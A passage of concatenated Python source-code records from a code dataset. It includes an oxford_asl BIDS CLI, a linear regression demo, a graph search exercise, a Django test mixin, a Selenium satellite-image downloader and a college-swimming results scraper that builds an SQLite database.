\",Cost)","sub_path":"Validating_dist.py","file_name":"Validating_dist.py","file_ext":"py","file_size_in_byte":9023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"122019462","text":"#! /usr/bin/env python3\n\nimport sys \n\nfrom . import prepare_config_files, run_config_files, run_fsl_anat\n\nhelp_string = (\"\"\"oxasl_bids: BIDS interface for the oxford_asl pipeline\n\nUsage:\noxasl_bids prepare --bidsdir [--common_args]\noxasl_bids run --bidsdir \n\n\"Prepare\" creates an oxford_asl configuration file for each acquisition within the BIDS directory. \nCommon arguments will be added in to each configuration, overriding BIDS-derived parameters.\nAfter having used \"prepare\", the \"run\" command will execute the oxford_asl commands \nRun either command without arguments for more information.\"\"\")\n\ndef main(argv):\n cmd_dict = {'prepare': prepare_config_files, \n 'run': run_config_files, \n 'fsl_anat': run_fsl_anat }\n if (len(argv)) and (argv[0] in cmd_dict): \n cmd_dict[argv[0]](argv[1:])\n else: \n print(help_string)\n\nif __name__ == \"__main__\":\n argv = sys.argv[1:]\n main(argv)\n","sub_path":"oxasl_bids/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"605864538","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# hypothesis y = a + bx + cz + ...\nx = np.linspace(-2, 2, 100)\ny = np.linspace(0, 4, 100)\nX, Y = np.meshgrid(x, y)\nput = []\nx_in, y_in, z_in = [],[],[]\nZ = X * 2 + Y * 3 + 5\nfor p in x:\n for q in y:\n x_in.append(p)\n y_in.append(q)\n z_in.append(p * 2 + q * 3 + 5)\n\nfig = plt.figure(1)\nax = Axes3D(fig)\n# ax.scatter(X, Y, Z)\ninp = [np.ones(len(z_in)), x_in, y_in]\nip = np.array(inp)\nprint(ip)\nth = np.array([0, 0, 0])\nz = np.array(z_in)\n\n\nclass HypothesisTwo(object):\n def __init__(self, dimension, m, lr):\n self.theta = np.array([0, 0, 0])\n self.m = m\n self.lr = lr\n self.dimension = dimension\n\n def calculate(self, i):\n return np.dot(self.theta, i)\n\n def iteration(self, i, j):\n while round(np.sum(self.calculate(i) - j), 5) != 0:\n temp = []\n for h in range(self.dimension):\n temp.append(self.theta[h] - self.lr * (1 / self.m) * np.sum((self.calculate(i) - j) * i[h]))\n self.theta = np.array(temp)\n ax.cla()\n ax.scatter(X, Y, Z,color=\"blue\")\n ax.plot_surface(X, Y, self.theta[0]+self.theta[1]*X + self.theta[2]*Y,color=\"red\")\n ax.text(0,0,-1,self.__str__(),fontdict={'size': 10, 'color': 'red'})\n plt.pause(0.1)\n # plt.cla()\n # plt.scatter(i, j)\n # plt.plot(i, hypo.a + hypo.b * i, 'r-', lw=5)\n # plt.text(0.5, 0, \"y = %.2f + %.2f x\" % (self.a, self.b), fontdict={'size': 20, 'color': 'red'})\n #\n\n def __str__(self):\n out = \"\"\n for l in range(self.dimension):\n if l == 0:\n out = out + \"z = %.2f \" % self.theta[l]\n else:\n out = out + \"+ %.2f*x%d \" % (self.theta[l], l)\n return out\n\n\nhypo = HypothesisTwo(3, len(z_in), 0.1)\n\nhypo.iteration(ip, z)\nprint(hypo)\n\n# plt.show()\n","sub_path":"WuEnda/LinearRegression2.py","file_name":"LinearRegression2.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163247484","text":"from edge_list_graph import Edge as Edge\nfrom edge_list_graph import Graph as Graph\nfrom edge_list_graph import Vertex as Vertex\n\nfrom adjacency_list_graph import Edge as Edge\nfrom adjacency_list_graph import Graph as Graph\nfrom adjacency_list_graph import Vertex as Vertex\ng = Graph()\n\ng.insert_vertex(15)\ng.insert_vertex(6)\ng.insert_vertex(38)\ng.insert_vertex(123)\ng.insert_vertex(66)\n\ng.insert_edge(10,15,38)\ng.insert_edge(23, 15,6)\ng.insert_edge(90, 15,66)\ng.insert_edge(8, 66,6)\ng.insert_edge(2, 66,38)\ng.insert_edge(76, 66,123)\ng.insert_edge(7, 123,6)\ng.insert_edge(55, 123,38)\n\n\nLastVisitet = 0\nmx = -1\nmySet = set()\ndef max_value(graf : Graph, vertex):\n global mx\n\n if(mySet.__len__() == graf.num_vertices()):\n return mx\n if(vertex > mx):\n mx = vertex\n if not mySet.__contains__(vertex):\n mySet.add(vertex)\n LastVisitet = vertex\n for i in graf.adjacent_vertices(vertex):\n if not mySet.__contains__(i):\n return max_value(graf, i)\n \n return max_value(graf, LastVisitet)\n\nprint(max_value(g, 15))","sub_path":"lektion 5 grafer dfs og bfs/opgaver.py","file_name":"opgaver.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"594500379","text":"from django.conf import settings \nfrom django.test import RequestFactory\nfrom django.utils.importlib import import_module\n\nclass SessionProductVariablesMixin(object):\n \"\"\"\n Adds specified product to test session \n \"\"\"\n\n def remove_product(self, product, request_function):\n\n self.factory = RequestFactory()\n engine = import_module(settings.SESSION_ENGINE)\n session_key = None \n\n request = request_function()\n request.session = engine.SessionStore(session_key)\n\n if product == 'basic_subscription':\n request.session['basic_subscription'] = True \n request.session['total'] = 18\n\n if product == 'plus_subscription':\n request.session['plus_subscription'] = True \n request.session['total'] = 45 \n\n if product == 'lets_meditate':\n request.session['lets_meditate'] = True \n request.session['total'] = 35\n\n return request","sub_path":"checkouts/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"61645749","text":"# No2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndata = {'apples': 10, 'oranges': 15, 'lemons': 5, 'limes':20}\r\nplt.figure()\r\nx = data.keys()\r\ny = data.values()\r\nplt.scatter(x, y, color = \"r\", s = 100)\r\nplt.plot(x, y, color= \"g\")\r\nplt.bar(x, y, width = 0.5)\r\nplt.show()\r\n","sub_path":"python_work1/No2.py","file_name":"No2.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"300765307","text":"from selenium.webdriver.common.action_chains import ActionChains\nfrom selenium import webdriver\nimport time\nfrom datetime import datetime\n\n# 記錄開始時間\nstart_time = datetime.now()\n\n# 自定義函式,小於10的數字補0 ex: 3 -> 03\n\"\"\"\n args:\n num (int)\n returm:\n string format.\n\"\"\"\ndef formatNumber(num):\n if num<10:\n return '0'+str(num)\n else:\n return str(num)\n\n# 載入瀏覽器驅動,以 Chrome 為例。請下載與電腦所安裝的瀏覽器版本相同的對應驅動。\n# Download source: https://chromedriver.chromium.org/downloads\nbrowser = webdriver.Chrome('./chromedriver')\n# set windows size\nbrowser.set_window_size(1024, 768)\n# 首次開啟網頁時需要點選 Accept 按鈕,因此透過 flag 變數來判斷是否首次執行。\nflag=0\n\n# 年份\nyearList=[2020]\n# 月份\nmonthList=[1,2,3,4,5,6,7,8]\n# 每月有幾天\ndayList=[31,28,31,30,31,30,31,31]\n# 迴圈存入指定的日期格式 年月日-時 ex: 20200926-08 \nqueryList=[]\n# satellite-hd-10min、top-alert-10min、satellite-water-vapor-10min\nmode= 'satellite-hd-10min'\n\nfor i in yearList:\n for j in monthList:\n for k in range(1, dayList[j-1]+1):\n for hour in range(24):\n queryList.append(str(i)+formatNumber(j)+formatNumber(k)+'-'+formatNumber(hour))\n\n# print(queryList)\nprint('爬取總天數: ',len(queryList))\n\n\n\nfor i in queryList:\n # 輸入欲爬取網頁\n url = 'https://meteologix.com/tw/satellite/taiwan/'+str(mode)+'/'+str(i)+'00z.html'\n browser.get(url)\n\n # 判斷是否首次執行(首次開啟網頁需要點選Anncept按鈕)\n if flag==0:\n time.sleep(1)\n browser.find_element_by_css_selector('.nx3Fpp8U.nx3gnDVX').click()\n flag=1\n time.sleep(0.5)\n # city name disable by class name\n browser.find_element_by_xpath('/html/body/div[1]/div/div[6]/div/div[1]/div/div/div[1]/div[1]/div[3]/div[1]/div[13]/div[9]/button[4]').click() \n # click menu by xpath\n browser.find_element_by_css_selector('.btn-group').click() \n time.sleep(0.5)\n # click download image by xpath\n browser.find_element_by_xpath('/html/body/div[1]/div/div[6]/div/div[1]/div/div/div[1]/div[1]/div[3]/div[1]/div[1]/div/div/ul/li[3]/span[2]').click() \n print(str(i), ' done!')\n\n\n# 總結執行時間\nend_time = datetime.now()\nprint('Duration: {}'.format(end_time - start_time))\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456769439","text":"__author__ = 'Siyao'\n\nfrom base import *\nfrom nltk.corpus import stopwords\nimport nltk\nfrom stemming.porter2 import stem\n\n\n# \n@app.route('/get_question', methods=['GET', 'POST', 'OPTIONS'])\n@crossdomain(origin='*', headers='Content-Type')\ndef get_question_for_post():\n data = json.loads(request.stream.read())\n content = {'q': data['tags'] + data['content']}\n import requests\n r = requests.get(SOLR_SERVER_ADDRESS, params=content).json()\n if r['response']['numFound'] != 0:\n return json.dumps(r['response']['docs'][0])\n else:\n return response.response_fail(\"No question found\")\n\n\n@app.route('/question_answered/', methods=['GET', 'POST', 'OPTIONS'])\n@crossdomain(origin='*', headers='Content-Type')\ndef question_answered_update_answered_count(question_id):\n try:\n return response.response_ok()\n except:\n return response.response_fail(\"Failed to update answer count\")\n# \n\n\n# \n@app.route('/topic_match', methods=['POST', 'OPTIONS'])\n@crossdomain(origin='*', headers='Content-Type')\ndef topic_match():\n try:\n raw = json.loads(request.stream.read())\n data = raw['data']\n status = raw['status']\n min_index = get_most_similar_post(status, data)\n return response.response_ok(min_index)\n except Exception as e:\n return response.response_fail(\"Error getting match %s\" % e)\n\n\ndef get_most_similar_post(status, all_posts):\n stops = set(stopwords.words('english'))\n all_tokens = set()\n # process all posts for tokens and store them in lists\n tokens_list_for_posts = []\n for d in all_posts:\n context = d.get('message', None)\n if context is None:\n context = d['description']\n tokens = get_tokens(context, stops)\n tokens_list_for_posts.append(tokens)\n all_tokens.update(tokens)\n # process status for tokens too\n status_tokens = get_tokens(status['text_content'], stops)\n all_tokens.update(status_tokens)\n\n # get vector for each post\n all_tokens = list(all_tokens)\n all_post_vectors = []\n for tokens_for_one_post in tokens_list_for_posts:\n vector_for_one_post = get_vector(all_tokens, tokens_for_one_post)\n all_post_vectors.append(vector_for_one_post)\n # get vector for status\n status_vector = get_vector(all_tokens, status_tokens)\n\n # compute distance between status and posts, and return the min distance index\n dist_list = [vector_distance(status_vector, i) for i in all_post_vectors]\n return dist_list.index(min(dist_list))\n\n\ndef get_vector(all_tokens, tokens_for_one_post):\n from math import sqrt, pow\n vector_for_one_post = [0] * len(all_tokens)\n for i in range(len(all_tokens)):\n if all_tokens[i] in tokens_for_one_post:\n vector_for_one_post[i] += 1\n length = sqrt(sum([pow(i, 2) for i in vector_for_one_post]))\n if length != 0:\n return [i/length for i in vector_for_one_post]\n else:\n return vector_for_one_post\n\n\ndef get_tokens(text, stops):\n lower_case = nltk.word_tokenize(text.lower())\n return [stem(t) for t in lower_case if (not t in stops) and t.isalpha()]\n\n\ndef vector_distance(status_vector, post_vector):\n # avoid returning post with no content\n if all(el == 0 for el in post_vector):\n return 1e9\n dist = 0.0\n for i, j in zip(status_vector, post_vector):\n dist += (i - j) * (i - j)\n return dist\n# \n","sub_path":"portals.py","file_name":"portals.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"316087470","text":"import urllib.request\r\nimport json\r\nimport sqlite3\r\nimport random\r\nimport re\r\nfrom constants import *\r\nfrom helperfunctions import *\r\nfrom team_dict import *\r\nfrom bs4 import BeautifulSoup\r\n\r\n########################################################################################################################\r\n# College Swimming Summer Break Project 2019 Brad Beacham #\r\n# Adapted from code by Kevin Wylder #\r\n# This file builds a database from data collected off collegeswimming.com for more detail on the structure of the #\r\n# database, the global variables in this file, or the collegeswimming.com website structure, see the README or #\r\n# constants file #\r\n# #\r\n# From here on out, 120 character width isn't guaranteed, but is usually followed #\r\n########################################################################################################################\r\n\r\n\r\ndef request_swimmer(swimmer_id, event, search_start_timestamp, search_end_timestamp):\r\n \"\"\"\r\n :param swimmer_id: Integer ID number of a specific swimmer\r\n :param event: the code used for classifying a given event\r\n :param search_start_timestamp: integer timestamp representing the beginning of the time frame we are collecting\r\n data from\r\n :param search_end_timestamp: integer timestamp representing the end of the time frame we are collecting data from\r\n :return swimmer_data: a 2-D array where the first column is the date a swim took place, second column is the time\r\n achieved by the swimmer in that event, and the third column is the numerical ID of the meet they were competing in.\r\n \"\"\"\r\n swimmer_data = []\r\n swimmer_events = [] # This will be filled with the list of all events that this swimmer has participated in\r\n url = SWIMMER_URL.format(swimmer_id)\r\n try: # to open a url for that swimmer and read their data\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty list\r\n return [[0,0,0]]\r\n soup = BeautifulSoup(source, 'html.parser')\r\n selection = soup.find(\"select\", class_=\"form-control input-sm js-event-id-selector\")\r\n if selection:\r\n for eventOption in selection.find_all(\"option\", class_=\"event\"):\r\n swimmer_events.append(eventOption[\"value\"])\r\n\r\n # If the event you want data on is contained within the list of events that swimmer has participated in, then add\r\n # that data to swimmer_data\r\n if event in swimmer_events:\r\n url = SWIMMER_EVENT_URL.format(swimmer_id, event)\r\n try: # open and read url containing info on \"event\" for \"swimmer_id\"\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e)\r\n return [[0,0,0]]\r\n event_history = json.loads(source)\r\n for swim in event_history:\r\n # convert the date string of a swim to time since epoch (in seconds)\r\n split_date = swim[\"dateofswim\"].split(\"-\")\r\n date = convert_to_time(int(split_date[0]), int(split_date[1]), int(split_date[2]))\r\n # if the swim occurred during desired time frame, add it to swimmer_data\r\n if search_start_timestamp < date < search_end_timestamp:\r\n swim_list = [date, swim[\"time\"], swim[\"meet_id\"]]\r\n swimmer_data.append(swim_list)\r\n return swimmer_data\r\n\r\n\r\ndef get_roster(team_id, season, gender):\r\n \"\"\"\r\n Input: a team_id, season, and gender used to uniquely identify a team\r\n Output: List of tuples containing swimmer names and IDs\r\n :param team_id: integer ID for a team\r\n :param season: string representing the season we are looking at (e.g. \"2017-2018\" season)\r\n :param gender: String M or F representing Men's or Women's roster\r\n :return team: a dictionary containing the team name and the names and ID's of all team members from the given season\r\n \"\"\"\r\n team = {}\r\n #gets a list of (Name, swimmer_id) tuples and the team name for a given team_id\r\n url = ROSTER_URL.format(team_id, gender, season)\r\n try: # open the url for the given team_id, season, and gender\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return {}\r\n\r\n soup = BeautifulSoup(source, 'html.parser')\r\n # find the team name from BeautifulSoup\r\n team[\"name\"] = soup.find(\"h1\", class_=\"c-toolbar__title\").text\r\n # find table containing full team roster from BeautifulSoup\r\n table_body = soup.find(\"table\", class_=\"c-table-clean c-table-clean--middle c-table-clean--fixed table table-hover\").tbody\r\n team[\"roster\"] = []\r\n # add team member names and ids to team dict\r\n for tableRow in table_body.find_all(\"tr\"):\r\n swimmer_id = tableRow.td.a[\"href\"].split(\"/\")[-1]\r\n swimmer_name = normalize_name(str(tableRow.td.strong.text))\r\n team[\"roster\"].append((swimmer_name, swimmer_id))\r\n return team\r\n\r\n\r\ndef get_team_results(team_id, season):\r\n \"\"\"\r\n :param team_id: integer id of the team to collect meets for (e.g. 184)\r\n :param season: string season from which you are collecting meets (e.g. \"2018-2019\")\r\n :return meets: dictionary of meet ids, names, and dates (for the purpose of filling in date slot in relays)\r\n \"\"\"\r\n url = RESULTS_URL.format(team_id, season)\r\n try: # open url for page containing all meets that given team participated in during given season\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return {}\r\n\r\n soup = BeautifulSoup(source, 'html.parser')\r\n print(\"getting meets for team {} during season {}\".format(team_id, season))\r\n # meets[\"team_name\"] = soup.find(\"h1\", class_=\"c-toolbar__title\").text\r\n\r\n meets = {}\r\n meet_list = soup.find(\"section\", class_=\"c-list-grid\") # find list of meets team participated in\r\n # Add individual meets and data about them to meets dictionary\r\n for meet in meet_list.find_all(\"a\"):\r\n meet_id = meet[\"href\"].split(\"/\")[-1]\r\n meet_name = meet.find(\"h3\").text\r\n meet_submitted = \"Completed\" in meet.find(\"ul\",\r\n class_=\"c-list-grid__meta o-list-inline o-list-inline--dotted\").text\r\n print(\"If no data is being collected from meets for relays, it may be because the \\\"Completed\\\" \"\r\n \"tag is no longer in use\")\r\n split_date = meet.find(\"time\")[\"datetime\"].split(\"-\")\r\n meet_date = convert_to_time(int(split_date[0]), int(split_date[1]), int(split_date[2]))\r\n\r\n meets[meet_id] = {\"meet_name\": meet_name, \"meet_date\": meet_date, \"submitted\": meet_submitted}\r\n print(meets)\r\n return meets\r\n\r\n\r\ndef get_meet_event_ids(meet, gender):\r\n \"\"\"\r\n :param meet: unique integer ID representing a meet\r\n :param gender: character M,F,X representing gender (male, female, mixed) to get events for\r\n :return event_id_dict: dictionary of event id's to event names for given meet\r\n #TODO: get this to work without a gender input\r\n #NOTE: if gender is not specified, it goes to a default gender (or last one you looked at on any page)\r\n # if a gender IS specified but it isn't in that meet, it will instead load W, M, or X (in that order)\r\n # simple solution is to just load page three times and live with time wasted overwriting dictionary values\r\n \"\"\"\r\n url = MEET_URL.format(meet, gender)\r\n try: # open url for given meet looking at results for gender\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return {}\r\n\r\n soup = BeautifulSoup(source, 'html.parser')\r\n print(\"getting event_ids for meet {} for gender {}\".format(meet, gender))\r\n # meets[\"team_name\"] = soup.find(\"h1\", class_=\"c-toolbar__title\").text\r\n\r\n event_id_dict = {}\r\n # Find list of all events from meet for given gender\r\n event_list = soup.find(\"ul\", class_=\"c-sticky-filters__list o-list-block o-list-block--divided js-max-height\")\r\n if event_list is not None:\r\n # add all events from the meet to event_id_dict\r\n for event in event_list.find_all(\"div\", class_=\"o-media o-media--flush\"):\r\n event = event.find(\"div\", title=\"Completed\")\r\n event_id = int(re.sub(\"[^0-9]\", \"\", event.text))\r\n event_name = event.find_next_sibling(\"div\").text\r\n event_id_dict[event_name] = event_id\r\n print(event_id_dict)\r\n return event_id_dict\r\n else:\r\n print(\"meet {} not submitted\".format(meet))\r\n return {\"MEET NOT SUBMITTED\": 0}\r\n\r\n\r\n# you could also do this by looking it up by team, then you just have to visit every meet.\r\ndef get_relay_leg_times(team_id, meet_id, relay_id):\r\n \"\"\"\r\n :param team_id: the team whose data you want to collect for the given relay event\r\n :param meet_id: the id of the meet they competed in\r\n :param relay_id: the id for the relay event at that particular meet\r\n :return relay_leg_times:\r\n \"\"\"\r\n # get IDs of the swimmers on a university's relay team(s)\r\n url = MEET_EVENT_URL.format(meet_id, relay_id)\r\n try: # open url for results of the relay in the meet designated by meet_id and relay_id\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return ([],[])\r\n soup = BeautifulSoup(source, \"html.parser\")\r\n\r\n swimmer_id_list = []\r\n times = []\r\n # find all times that team_id is mentioned in BeautifulSoup\r\n team_instances = soup.find_all(\"a\", href=\"/team/{}\".format(team_id)) # find out actual name for relay teams\r\n # get relay leg times by relay team (note that all relay teams checked are from same main team)\r\n for team in team_instances:\r\n if len(team.attrs) == 2: # team names are mentioned multiple times in each row, check for correct column\r\n # if a team was disqualified, skip it\r\n if \"DQ\" in team.find_parent('td').find_next_sibling().text:\r\n print(\"excluding disqualified team.\")\r\n continue\r\n\r\n # get list of all 4 swimmers on relay team\r\n table_soup = team.find_next_sibling('ol')\r\n for swimmer in table_soup.find_all('a'):\r\n swimmer_id_list.append(swimmer['href'].split('/')[2])\r\n\r\n # get the split times of the 4 swimmers on a relay team\r\n splash_split_id = team.find_parent('td').find_next_sibling().find('abbr')['id'][4:]\r\n splash_splits_url = SPLASH_SPLITS_URL.format(splash_split_id)\r\n try: # open url with table of relay split time table\r\n page = urllib.request.urlopen(splash_splits_url)\r\n splash_source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e) # otherwise print out the error and return empty tuple\r\n return ([],[])\r\n\r\n # add split times, if they were recorded\r\n # NOTE: this might be an issue if names are available but not splits. see if this is a possible situation\r\n splash_soup = BeautifulSoup(splash_source,\"html.parser\").tbody\r\n if splash_soup is None:\r\n print(\"no splits available for meet {}\".format(meet_id))\r\n return []\r\n for row in splash_soup.find_all(\"tr\"):\r\n if row.find_all(\"td\")[-1].text[0].isdigit(): # in relays longer than 200Y, not all rows have leg times.\r\n times.append(row.find_all(\"td\")[-1].text) # this is the leg time for a given swimmer.\r\n else:\r\n continue\r\n print(swimmer_id_list)\r\n print(times)\r\n relay_leg_times = list(zip(swimmer_id_list, times))\r\n return relay_leg_times\r\n\r\n\r\ndef get_relay_swim_data(team_to_pull, gender_to_pull, season_to_pull, relays_to_pull):\r\n \"\"\"\r\n :param team_to_pull: the ID number of the team whose data is being collected\r\n :param gender_to_pull: a character M,F,X representing Male, Female, or Mixed\r\n :param season_to_pull: a string representing the season/year the data is being pulled from\r\n :param relays_to_pull: List of relay events to pull. (e.g. MM200 = Men's 200 Yard Medley Relay)\r\n :return relay_swims: 2D list where rows are individual swims and columns are in following format:\r\n [swimmer_id, team_id, time, 0, meet_id, gender, event_code, date, 0, snapshot_id]\r\n which is identical to the format in which new rows are added to swims table\r\n \"\"\"\r\n # used to differentiate between relay teams within a team\r\n team_letter = {0: \"A\", 1: \"B\", 2: \"C\", 3: \"D\", 4: \"E\", 5: \"F\"}\r\n\r\n # Event is a medley relay, so names relay legs accordingly as events and appends them to relay_swims\r\n def medley():\r\n medley_leg_dict = {0: \"LM\", 1: \"2M\", 2: \"3M\", 3: \"4M\"}\r\n for i in range(len(relay_results)):\r\n # NOTE: This assumes teams place exactly as planned\r\n medley_leg_name = medley_leg_dict[i%4] + str(int(relay_string[1:-1])//4) + team_letter[i//4]\r\n relay_swims.append([relay_results[i][0], team_to_pull, relay_results[i][1], 0, meet_id, gender_to_pull,\r\n medley_leg_name, meets[meet_id][\"meet_date\"]])\r\n\r\n # Event is freestyle relay, so names relay legs accordingly as events and appends them to relay_swims\r\n def freestyle():\r\n for i in range(len(relay_results)):\r\n if i % 4 != 0:\r\n # NOTE: This assumes teams place exactly as planned\r\n freestyle_leg_name = \"1F\" + str(int(relay_string[1:-1])//4) + team_letter[i//4]\r\n else:\r\n freestyle_leg_name = \"LF\" + str(int(relay_string[1:-1])//4) + team_letter[i//4]\r\n\r\n relay_swims.append([relay_results[i][0], team_to_pull, relay_results[i][1], 0, meet_id, gender_to_pull,\r\n freestyle_leg_name, meets[meet_id][\"meet_date\"]])\r\n\r\n relay_swims = []\r\n\r\n # get full dictionary of meets and their data\r\n meets = get_team_results(team_to_pull, season_to_pull) # can have this work the same way that get_swim_data does later if that helps\r\n list_of_meets = list(meets.keys())\r\n\r\n for meet_id in list_of_meets:\r\n if meets[meet_id][\"submitted\"]:\r\n # add \"events\" key to meets, containing all events in meet that gender_to_pull participated in\r\n meets[meet_id][\"events\"] = get_meet_event_ids(meet_id, gender_to_pull)\r\n # add data on all relay types in relays_to_pull to relay_swims\r\n for relay_string in relays_to_pull:\r\n event_name = to_event_title(gender_to_pull + relay_string)\r\n if event_name in meets[meet_id][\"events\"]:\r\n # get all relay leg times for team_to_pull in meet meet_id for relay relay_string\r\n relay_results = get_relay_leg_times(team_to_pull, meet_id, meets[meet_id][\"events\"][event_name])\r\n if relay_string[0] is \"M\":\r\n medley()\r\n elif relay_string[0] is \"F\":\r\n freestyle()\r\n else:\r\n print(\"Results for {} not submitted\".format(meets[meet_id][\"meet_name\"]))\r\n return relay_swims, meets # NOTE: can add meets as a return value to use it to make meets database table\r\n\r\n\r\ndef get_swim_data(teams_to_pull, genders_to_pull,\r\n year_start, year_end,\r\n events_to_pull=DEFAULT_EVENTS_TO_PULL,\r\n database_file_name=DATABASE_FILE_NAME, ):\r\n \"\"\"\r\n :param teams_to_pull: List of strings where each string is a swim team (e.g. \"Bucknell University\")\r\n :param genders_to_pull: List of characters M, F, representing Male and Female\r\n :param year_start: Integer value of year to start pulling data from\r\n :param year_end: Integer value of final year for data pull\r\n :param events_to_pull: List of event codes for events to pull data on\r\n :param database_file_name: The name of the database file that information will be stored in\r\n :return: Nothing is returned. database_file_name will have data written to it, and will be created if it didn't\r\n exist before.\r\n \"\"\"\r\n\r\n # remove relays from events_to_pull for later/separate processing\r\n relays_to_pull = []\r\n for event in events_to_pull:\r\n if event[0] in \"MF\":\r\n events_to_pull.remove(event)\r\n relays_to_pull.append(event)\r\n\r\n # Convert team_dict entries to integer team ID's.\r\n for team in range(len(teams_to_pull)):\r\n teams_to_pull[team] = TEAM_DICT[teams_to_pull[team]]\r\n\r\n # open the sqlite database\r\n connection = sqlite3.connect(database_file_name)\r\n cursor = connection.cursor()\r\n\r\n # add information about this snapshot to the Snapshots table (and create it if it doesn't exist)\r\n cursor.execute(CREATE_SNAPSHOT_TABLE_COMMAND)\r\n snapshot_id = random.randint(0, 4294967295) # what are the odds? 100% I'm a lazy programmer << NOTE: change this\r\n\r\n # create a Snapshot entry of the new data being pulled. This is essentially a changelog\r\n date_range_string = \"{0}.{1}.{2}-{3}.{1}.{2}\".format(year_start, SEASON_LINE_MONTH, SEASON_LINE_DAY, year_end)\r\n teams_string = \",\".join(str(team) for team in teams_to_pull)\r\n events_string = \",\".join(events_to_pull)\r\n cursor.execute(INSERT_SNAPSHOT_COMMAND.format(snapshot_id, date_range_string, teams_string, events_string))\r\n\r\n # ensure the existence of each event table and the Teams/Swimmers tables\r\n cursor.execute(CREATE_SWIMS_TABLE)\r\n cursor.execute(CREATE_SWIMMER_TABLE.format(\"Swimmers\"))\r\n cursor.execute(CREATE_TEAM_TABLE.format(\"Teams\"))\r\n cursor.execute(CREATE_MEET_TABLE)\r\n \r\n # retrieve and add the times to the database\r\n for simple_year in range(year_start, year_end): # for each competition year, do the following\r\n # THIS IS WHERE SEASON STRING IS MADE AND ROSTER URL BUILDING IS STARTED\r\n season_string = simple_year - 1996#str(simple_year) + \"-\" + str(simple_year + 1) # old method\r\n print(\"Collecting Season {}\".format(season_string))\r\n search_start_timestamp = convert_to_time(int(simple_year), SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n search_end_timestamp = convert_to_time(int(simple_year) + 1, SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n\r\n team_counter = 0\r\n percent = 0\r\n for team_id in teams_to_pull: # for each team\r\n for gender in genders_to_pull: # for each gender\r\n # pull the roster for this season and gender\r\n team = get_roster(team_id, season_string, gender)\r\n print (team)\r\n # add team to the Teams table\r\n if not team[\"name\"] is \"\": # if there wasn't a 404 error, check if there is existing data on team\r\n matches = cursor.execute(CHECK_TEAM_TABLE.format(\"Teams\", team_id))\r\n if matches.fetchone() is None: # if there are no duplicates, add the team to team table\r\n cursor.execute(ADD_TO_TEAM_TABLE.format(\"Teams\", team[\"name\"], team_id))\r\n for index, swimmer in enumerate(team[\"roster\"]):\r\n print(swimmer[0] + \" \" + swimmer[1]) # for each swimmer on the team\r\n\r\n # enumerate this loop to have an index for the loading bar\r\n percent_of_team = float(index) / float(len(team[\"roster\"]))\r\n show_loading_bar(percent + (percent_of_team / float(len(teams_to_pull))))\r\n\r\n # add the swimmer to the Swimmers table, if they aren't there already\r\n matches = cursor.execute(CHECK_SWIMMER_TABLE.format(\"Swimmers\", swimmer[1]))\r\n if matches.fetchone() is None:\r\n cursor.execute(ADD_TO_SWIMMER_TABLE.format(\"Swimmers\", sqlsafe(swimmer[0]), gender, swimmer[1], team_id))\r\n # Add all of this swimmer's swim data for this season to the swims table, for the events requested\r\n for event in events_to_pull: # pull swim data for requested events\r\n print(swimmer[1] + \" \" + event)\r\n swims = request_swimmer(swimmer[1], event, search_start_timestamp, search_end_timestamp)\r\n sys.stdout.flush()\r\n # Add swims to Swims table\r\n for swim in swims:\r\n command = INSERT_SWIM_COMMAND.format(swimmer[1], team_id, swim[1], 0, swim[2], gender, event, swim[0], 0, snapshot_id)\r\n cursor.execute(command)\r\n\r\n # Retrieve relay swim data and data on meets that team team_id competed in\r\n relay_swims, meets = get_relay_swim_data(team_id, gender, season_string, relays_to_pull)\r\n\r\n # Add relay swim data to database swims table\r\n for relay_swim in relay_swims:\r\n relay_command = INSERT_SWIM_COMMAND.format(relay_swim[0],relay_swim[1],relay_swim[2],0,\r\n relay_swim[4], relay_swim[5], relay_swim[6],\r\n relay_swim[7], 0, snapshot_id)\r\n cursor.execute(relay_command)\r\n\r\n # Add meet data to database meets table\r\n # NOTE: Meets table still hasn't been pulled/created yet, if get_swim_data fails try commenting out this\r\n #for meet in meets:\r\n # matches = cursor.execute(CHECK_MEET_TABLE.format(meet))\r\n # if matches.fetchone() is None:\r\n # meet_command = INSERT_MEET_COMMAND.format(meet, meets[meet][\"meet_name\"],\r\n # meets[meet][\"meet_date\"],\r\n # meets[meet][\"submitted\"])\r\n # cursor.execute(meet_command)\r\n\r\n # print the loading 